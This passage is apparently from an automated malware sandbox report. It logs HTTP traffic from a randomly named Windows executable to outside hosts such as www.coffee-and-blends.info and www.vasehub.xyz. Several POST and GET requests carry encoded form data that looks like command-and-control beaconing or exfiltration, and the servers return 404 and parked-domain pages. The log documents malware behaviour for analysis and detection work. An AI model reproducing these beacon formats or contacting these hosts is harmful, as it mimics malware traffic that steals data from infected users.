                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            16192.168.2.849831162.213.249.216806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:58.470088959 CET536OUTGET /rhgo/?mnYxMt=1xwwfRv/EtrSMau9mvfnqZyv+rHmSC/oq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tCPQXm9YsirdLDRzA3cfwD9qJJnnuO9mn3dTqKhTCwV4Aw==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:34:59.166017056 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:59 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            17192.168.2.849850217.160.0.231806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:04.288039923 CET824OUTPOST /jp2s/ HTTP/1.1
                                                                                                                                                            Host: www.coffee-and-blends.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.coffee-and-blends.info
                                                                                                                                                            Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 75 68 50 45 35 34 44 72 2f 73 66 6b 78 55 4c 56 35 63 6b 51 66 79 64 47 66 75 6f 73 77 78 47 6a 4f 33 77 66 62 65 64 70 46 53 6f 69 39 73 49 48 4a 2f 4c 35 4c 7a 63 4d 4e 36 68 6e 38 58 6b 6c 59 79 63 74 64 38 2f 37 7a 38 73 61 4b 34 44 47 49 66 38 2b 67 4f 54 4c 32 31 57 74 6c 6c 55 68 79 78 42 4b 52 78 39 4b 49 53 38 36 48 70 31 4d 6b 76 44 46 73 4d 54 48 38 44 43 45 41 6d 35 6d 74 39 66 4d 49 50 64 44 37 48 4e 44 6c 55 30 75 58 36 79 42 4d 76 47 49 51 4c 7a 44 6f 6a 68 5a 52 6b 67 44 78 45 43 6f 79 79 65 2f 4d 49 62 52 52 32 34 6c 2b 70 45 67 57 58 30 3d
                                                                                                                                                            Data Ascii: mnYxMt=C2Cm4mvFygX4uhPE54Dr/sfkxULV5ckQfydGfuoswxGjO3wfbedpFSoi9sIHJ/L5LzcMN6hn8XklYyctd8/7z8saK4DGIf8+gOTL21WtllUhyxBKRx9KIS86Hp1MkvDFsMTH8DCEAm5mt9fMIPdD7HNDlU0uX6yBMvGIQLzDojhZRkgDxECoyye/MIbRR24l+pEgWX0=
                                                                                                                                                            Nov 12, 2024 18:35:05.120455980 CET779INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:04 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                                            Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            18192.168.2.849860217.160.0.231806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:06.831748009 CET844OUTPOST /jp2s/ HTTP/1.1
                                                                                                                                                            Host: www.coffee-and-blends.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.coffee-and-blends.info
                                                                                                                                                            Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 38 52 2f 45 70 72 72 72 6f 63 66 6a 30 55 4c 56 33 38 6c 34 66 79 5a 47 66 72 49 38 77 44 79 6a 50 57 41 66 56 2f 64 70 4a 79 6f 69 6c 63 4a 50 55 50 4c 6e 4c 7a 41 75 4e 37 4e 6e 38 58 77 6c 59 7a 73 74 61 4e 2f 34 77 4d 73 63 4d 34 44 45 56 76 38 2b 67 4f 54 4c 32 31 43 48 6c 6d 6b 68 79 46 46 4b 51 54 56 4a 54 79 38 37 4f 4a 31 4d 76 50 44 4a 73 4d 53 53 38 47 61 2b 41 6b 78 6d 74 2f 58 4d 4a 65 64 41 78 48 4e 46 36 45 31 62 52 50 66 77 4f 4e 6d 78 51 4c 76 32 6f 53 59 6d 5a 79 4e 70 72 6d 4b 75 78 79 32 55 4d 4c 7a 6e 55 42 6c 4e 6b 4b 55 51 49 41 69 37 43 62 38 44 41 76 68 4b 47 78 2f 6c 4b 78 5a 7a 65 36 4c 77
                                                                                                                                                            Data Ascii: mnYxMt=C2Cm4mvFygX48R/Eprrrocfj0ULV38l4fyZGfrI8wDyjPWAfV/dpJyoilcJPUPLnLzAuN7Nn8XwlYzstaN/4wMscM4DEVv8+gOTL21CHlmkhyFFKQTVJTy87OJ1MvPDJsMSS8Ga+Akxmt/XMJedAxHNF6E1bRPfwONmxQLv2oSYmZyNprmKuxy2UMLznUBlNkKUQIAi7Cb8DAvhKGx/lKxZze6Lw
                                                                                                                                                            Nov 12, 2024 18:35:07.671664000 CET779INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:07 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                                            Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            19192.168.2.849872217.160.0.231806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:09.619227886 CET1861OUTPOST /jp2s/ HTTP/1.1
                                                                                                                                                            Host: www.coffee-and-blends.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.coffee-and-blends.info
                                                                                                                                                            Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 38 52 2f 45 70 72 72 72 6f 63 66 6a 30 55 4c 56 33 38 6c 34 66 79 5a 47 66 72 49 38 77 44 4b 6a 4f 6b 34 66 56 63 31 70 48 53 6f 69 37 73 4a 4f 55 50 4b 69 4c 7a 59 71 4e 36 78 4e 38 56 49 6c 5a 56 77 74 62 2f 62 34 72 63 73 63 42 59 44 46 49 66 38 52 67 4f 6a 50 32 31 53 48 6c 6d 6b 68 79 44 70 4b 5a 68 39 4a 55 43 38 36 48 70 31 49 6b 76 44 6c 73 4d 4c 6c 38 43 48 4a 44 56 52 6d 74 66 6e 4d 4f 73 6c 41 72 48 4e 48 37 45 31 44 52 50 62 72 4f 4e 36 4c 51 49 79 74 6f 56 30 6d 4a 31 30 75 2f 31 36 31 72 51 6d 46 42 49 6a 54 63 51 46 77 37 73 63 38 44 43 4c 62 4c 50 63 39 50 4e 31 6d 53 68 61 2f 53 58 74 6e 51 71 65 6f 56 4d 56 56 70 4c 72 6f 76 79 76 71 67 41 75 73 61 68 71 4d 62 33 61 4f 41 45 73 32 64 4d 51 71 4a 77 78 68 53 54 4f 42 5a 52 35 78 62 4c 47 2f 39 65 53 55 30 75 73 69 43 32 5a 37 55 74 4c 4c 65 73 35 6b 78 54 74 53 47 55 36 4c 6f 4d 61 33 6d 33 50 6b 41 38 5a 49 59 61 56 64 59 77 56 52 75 39 4a 6d 36 79 75 32 67 4f 31 2f 38 67 6e [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=C2Cm4mvFygX48R/Eprrrocfj0ULV38l4fyZGfrI8wDKjOk4fVc1pHSoi7sJOUPKiLzYqN6xN8VIlZVwtb/b4rcscBYDFIf8RgOjP21SHlmkhyDpKZh9JUC86Hp1IkvDlsMLl8CHJDVRmtfnMOslArHNH7E1DRPbrON6LQIytoV0mJ10u/161rQmFBIjTcQFw7sc8DCLbLPc9PN1mSha/SXtnQqeoVMVVpLrovyvqgAusahqMb3aOAEs2dMQqJwxhSTOBZR5xbLG/9eSU0usiC2Z7UtLLes5kxTtSGU6LoMa3m3PkA8ZIYaVdYwVRu9Jm6yu2gO1/8gnLEh5BJ3mMboVknRqe2adxdvToY/h/EzkO9EvSVR9gh4n3wuUqWCPZ7q+8Hq3J8Z9mDoRPpHBnzWMRhdjudnMaBne9G0ZemFyo14NS6cCLE5LcP2SA+ubSKDom5a2v7Dw4LH84FZ6Hz0koL0RJ3WzSXgCB+zmjaqnDwtYAZExLF48tfGdgudLzZESvDsqXOTpIKm9zz+c3b7xBaWw4KMuMRhtmYD2HRTy9RG/VheZXRPJcV13zo4IMHJPtGCRVT5r/KbYhhny1yhG2AxQCIST8Zx9YPRgSj2rqbCyu3LkZheUpJb4cKLn17r8GSgGkNCQbhRPZhTsVR5ZxCQZzd9B1Va3SjgIobSiFBLnkKUrdcsipIYXzCiVgJPqK3h9wCPuYQAGAJH7kSwJ84pM6Uezp2PiE2+9vkBxPVCaqNCjpel+82/HdkVz5GKj0QWOOfongwzRzHE/dYr9UG2aiV+SW53ApPSD10s5pjaMBy8Ej8Vj3ynFcxlPrdxPfXMhNVFS1eCLmBy+uJ4Vl2F4gs030x9uxWB41vTdzVjl7Dq1KYfYShho9/U2+88WXk/Kd5C20Fc/g8FtSDRhQclkHstL5CcWYZSOSffluHOulFrMlsdhS8yhxMGW5tU9bnFmy9fQwWHVoaHKrHWUaQZJR0Tlvc2rrrWN9A8qaT [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:35:10.482788086 CET779INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:10 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                                            Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            20192.168.2.849885217.160.0.231806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:12.157274961 CET547OUTGET /jp2s/?TTd=yRNPZBU8fZA&mnYxMt=P0qG7QiazDWD2BWfpofH/Z3c5n3R/ut+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4weE+MfzEO7kysrfh1XHRqn8s8FFNRzB3KWFDa4Bz8OGfyA== HTTP/1.1
                                                                                                                                                            Host: www.coffee-and-blends.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:35:13.682293892 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 1271
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:12 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:35:13.682308912 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                                                                                                                            Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>
                                                                                                                                                            Nov 12, 2024 18:35:13.682321072 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                                                                                                                            Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>
                                                                                                                                                            Nov 12, 2024 18:35:13.682354927 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 1271
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:12 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:35:13.683923006 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 1271
                                                                                                                                                            Connection: close
